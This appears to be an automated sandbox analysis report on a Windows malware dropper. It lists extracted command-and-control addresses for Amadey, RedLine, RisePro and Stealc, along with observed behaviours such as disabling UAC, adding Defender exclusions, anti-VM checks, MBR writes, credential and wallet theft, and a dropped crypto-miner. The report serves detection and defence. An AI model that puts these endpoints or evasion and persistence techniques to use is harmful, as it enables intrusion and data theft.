Analysis
-
max time kernel
82s -
max time network
153s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
16-05-2024 19:19
Behavioral task
behavioral1
Sample
9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral2
Sample
9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe
Resource
win11-20240419-en
General
-
Target
9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe
-
Size
1.6MB
-
MD5
bbc637c40171df63142a3e086b7606b8
-
SHA1
e29da24e8d3864a83195df7f97beba53172fe779
-
SHA256
9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f
-
SHA512
6859dfdb4e78c837714127370a22ae3c30798c8c16a9b6e355424ed2facf7dabc561a071f0c34b149ecf0c63068c110c9e53e4d945359d1749c365b8e4390e48
-
SSDEEP
49152:OFWxRZfKX0sd2dij4pNzG1PXIBHthTP+UHALIucE5G:Oue0tw4nzUPgHtBPIL+EY
Malware Config
Extracted
amadey
4.20
18befc
http://5.42.96.141
-
install_dir
908f070dff
-
install_file
explorku.exe
-
strings_key
b25a9385246248a95c600f9a061438e1
-
url_paths
/go34ko8/index.php
Extracted
amadey
4.20
c767c0
http://5.42.96.7
-
install_dir
7af68cdb52
-
install_file
axplons.exe
-
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
-
url_paths
/zamo7h/index.php
Extracted
risepro
147.45.47.126:58709
Extracted
redline
@CLOUDYTTEAM
185.172.128.33:8970
Extracted
redline
1
185.215.113.67:26260
Extracted
stealc
zzvv
http://23.88.106.134
-
url_path
/c73eed764cc59dcb.php
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe family_redline C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_redline behavioral2/memory/3956-141-0x0000000000E20000-0x0000000000E72000-memory.dmp family_redline behavioral2/memory/4016-146-0x00000000007B0000-0x0000000000870000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe family_redline behavioral2/memory/2776-193-0x00000000002F0000-0x0000000000342000-memory.dmp family_redline -
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe -
Processes:
file300un.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe = "0" file300un.exe -
XMRig Miner payload 4 IoCs
Processes:
resource yara_rule C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe family_xmrig C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe xmrig C:\Windows\Temp\445001.exe family_xmrig C:\Windows\Temp\445001.exe xmrig -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
Processes:
9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exeexplorku.exeamers.exeaxplons.exe20d9aab82e.exeaxplons.exeexplorku.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amers.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 20d9aab82e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepid process 2964 powershell.exe 4768 powershell.exe 2764 powershell.exe 2108 powershell.exe 2144 powershell.exe 1976 powershell.exe 4932 powershell.exe 4636 powershell.exe 3732 powershell.exe 4296 powershell.exe 4288 powershell.exe 3952 powershell.exe 2824 powershell.exe 5048 powershell.exe 3972 powershell.exe 3492 powershell.exe 1032 powershell.exe 1532 powershell.exe 2232 powershell.exe 2192 powershell.EXE 1868 powershell.exe 4260 powershell.exe 2964 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 3800 netsh.exe 896 netsh.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
amers.exe20d9aab82e.exeaxplons.exeexplorku.exeexplorku.exeaxplons.exe9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 20d9aab82e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 20d9aab82e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe -
Executes dropped EXE 28 IoCs
Processes:
explorku.exeamers.exeaxplons.exe20d9aab82e.exealex.execrypted333.exetrf.exekeks.exeredline1.exeinstall.exeGameService.exeGameService.exeGameService.exeGameService.exeGameStabilityService.exe445001.exeswizzzz.exeaxplons.exelumma1.exeexplorku.exeNewB.exefile300un.exe2UHJ6uEjwN1megUBNK5uha5D.exeOR27MElvsSr4pubuwCN6eSHH.exew2eZW3DpjD8Wm4ZLMB9QEm0V.exebti7iaMBgV4UC96BWBjacHN6.exeOR27MElvsSr4pubuwCN6eSHH.exebti7iaMBgV4UC96BWBjacHN6.exepid process 2792 explorku.exe 3056 amers.exe 1640 axplons.exe 792 20d9aab82e.exe 4824 alex.exe 3276 crypted333.exe 4016 trf.exe 3956 keks.exe 2776 redline1.exe 3380 install.exe 1008 GameService.exe 4992 GameService.exe 4720 GameService.exe 4044 GameService.exe 3908 GameStabilityService.exe 3892 445001.exe 2284 swizzzz.exe 4628 axplons.exe 1256 lumma1.exe 1152 explorku.exe 2376 NewB.exe 4004 file300un.exe 1136 2UHJ6uEjwN1megUBNK5uha5D.exe 836 OR27MElvsSr4pubuwCN6eSHH.exe 1916 w2eZW3DpjD8Wm4ZLMB9QEm0V.exe 4968 bti7iaMBgV4UC96BWBjacHN6.exe 1220 OR27MElvsSr4pubuwCN6eSHH.exe 232 bti7iaMBgV4UC96BWBjacHN6.exe -
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
amers.exeaxplons.exeaxplons.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine amers.exe Key opened \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine axplons.exe -
Loads dropped DLL 3 IoCs
Processes:
RegAsm.exew2eZW3DpjD8Wm4ZLMB9QEm0V.exepid process 3036 RegAsm.exe 3036 RegAsm.exe 1916 w2eZW3DpjD8Wm4ZLMB9QEm0V.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/2940-0-0x00000000003A0000-0x000000000089A000-memory.dmp themida behavioral2/memory/2940-2-0x00000000003A0000-0x000000000089A000-memory.dmp themida behavioral2/memory/2940-3-0x00000000003A0000-0x000000000089A000-memory.dmp themida behavioral2/memory/2940-1-0x00000000003A0000-0x000000000089A000-memory.dmp themida behavioral2/memory/2940-5-0x00000000003A0000-0x000000000089A000-memory.dmp themida behavioral2/memory/2940-7-0x00000000003A0000-0x000000000089A000-memory.dmp themida behavioral2/memory/2940-6-0x00000000003A0000-0x000000000089A000-memory.dmp themida behavioral2/memory/2940-4-0x00000000003A0000-0x000000000089A000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe themida behavioral2/memory/2792-20-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/2940-19-0x00000000003A0000-0x000000000089A000-memory.dmp themida behavioral2/memory/2792-23-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/2792-28-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/2792-27-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/2792-26-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/2792-25-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/2792-24-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/2792-22-0x0000000000420000-0x000000000091A000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\1000014001\20d9aab82e.exe themida behavioral2/memory/792-82-0x0000000000AD0000-0x000000000115B000-memory.dmp themida behavioral2/memory/792-81-0x0000000000AD0000-0x000000000115B000-memory.dmp themida behavioral2/memory/792-80-0x0000000000AD0000-0x000000000115B000-memory.dmp themida behavioral2/memory/792-83-0x0000000000AD0000-0x000000000115B000-memory.dmp themida behavioral2/memory/792-84-0x0000000000AD0000-0x000000000115B000-memory.dmp themida behavioral2/memory/792-85-0x0000000000AD0000-0x000000000115B000-memory.dmp themida behavioral2/memory/792-86-0x0000000000AD0000-0x000000000115B000-memory.dmp themida behavioral2/memory/792-88-0x0000000000AD0000-0x000000000115B000-memory.dmp themida behavioral2/memory/792-87-0x0000000000AD0000-0x000000000115B000-memory.dmp themida behavioral2/memory/2792-97-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/792-250-0x0000000000AD0000-0x000000000115B000-memory.dmp themida behavioral2/memory/1152-405-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/1152-409-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/1152-410-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/1152-406-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/1152-408-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/1152-407-0x0000000000420000-0x000000000091A000-memory.dmp themida behavioral2/memory/1152-417-0x0000000000420000-0x000000000091A000-memory.dmp themida C:\Users\Admin\Pictures\Z7d7LfFtxylF4EUq49DQKdTJ.exe themida behavioral2/memory/756-767-0x0000000140000000-0x0000000140C18000-memory.dmp themida -
Processes:
file300un.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths file300un.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe = "0" file300un.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explorku.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\20d9aab82e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000014001\\20d9aab82e.exe" explorku.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
explorku.exe20d9aab82e.exeexplorku.exefile300un.exe9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 20d9aab82e.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 75 api.myip.com 76 ipinfo.io 4 ipinfo.io 12 api.myip.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
w2eZW3DpjD8Wm4ZLMB9QEm0V.exedescription ioc process File opened for modification \??\PhysicalDrive0 w2eZW3DpjD8Wm4ZLMB9QEm0V.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
amers.exeaxplons.exeaxplons.exepid process 3056 amers.exe 1640 axplons.exe 4628 axplons.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
alex.execrypted333.exeswizzzz.exelumma1.exefile300un.exedescription pid process target process PID 4824 set thread context of 4516 4824 alex.exe RegAsm.exe PID 3276 set thread context of 5028 3276 crypted333.exe RegAsm.exe PID 2284 set thread context of 3036 2284 swizzzz.exe RegAsm.exe PID 1256 set thread context of 1900 1256 lumma1.exe RegAsm.exe PID 4004 set thread context of 4504 4004 file300un.exe regsvcs.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
OR27MElvsSr4pubuwCN6eSHH.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN OR27MElvsSr4pubuwCN6eSHH.exe -
Drops file in Program Files directory 6 IoCs
Processes:
install.exedescription ioc process File opened for modification C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe install.exe File created C:\Program Files (x86)\GameStabilityService\installm.bat install.exe File opened for modification C:\Program Files (x86)\GameStabilityService\installm.bat install.exe File created C:\Program Files (x86)\GameStabilityService\GameService.exe install.exe File opened for modification C:\Program Files (x86)\GameStabilityService\GameService.exe install.exe File created C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe install.exe -
Drops file in Windows directory 2 IoCs
Processes:
9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exeamers.exedescription ioc process File created C:\Windows\Tasks\explorku.job 9a4eee0b7c365fffc429b849cc2a1866615f6285d8953e6435c5bd1972a49d5f.exe File created C:\Windows\Tasks\axplons.job amers.exe -
Launches sc.exe 16 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1892 sc.exe 3748 sc.exe 4548 sc.exe 3952 sc.exe 2476 sc.exe 3324 sc.exe 1152 sc.exe 2080 sc.exe 4640 sc.exe 1752 sc.exe 1528 sc.exe 2568 sc.exe 1064 sc.exe 1020 sc.exe 5024 sc.exe 348 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 11 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4448 4824 WerFault.exe alex.exe 692 1136 WerFault.exe 2UHJ6uEjwN1megUBNK5uha5D.exe 2144 1136 WerFault.exe 2UHJ6uEjwN1megUBNK5uha5D.exe 3068 1136 WerFault.exe 2UHJ6uEjwN1megUBNK5uha5D.exe 1804 1136 WerFault.exe 2UHJ6uEjwN1megUBNK5uha5D.exe 400 1136 WerFault.exe 2UHJ6uEjwN1megUBNK5uha5D.exe 908 1136 WerFault.exe 2UHJ6uEjwN1megUBNK5uha5D.exe 4296 1136 WerFault.exe 2UHJ6uEjwN1megUBNK5uha5D.exe 3048 1136 WerFault.exe 2UHJ6uEjwN1megUBNK5uha5D.exe 564 1136 WerFault.exe 2UHJ6uEjwN1megUBNK5uha5D.exe 644 1136 WerFault.exe 2UHJ6uEjwN1megUBNK5uha5D.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1532 schtasks.exe 3488 schtasks.exe 2232 schtasks.exe 2532 schtasks.exe 2124 schtasks.exe 2764 schtasks.exe 2704 schtasks.exe 976 schtasks.exe 4292 schtasks.exe 3012 schtasks.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4016 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
OR27MElvsSr4pubuwCN6eSHH.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" OR27MElvsSr4pubuwCN6eSHH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" OR27MElvsSr4pubuwCN6eSHH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe 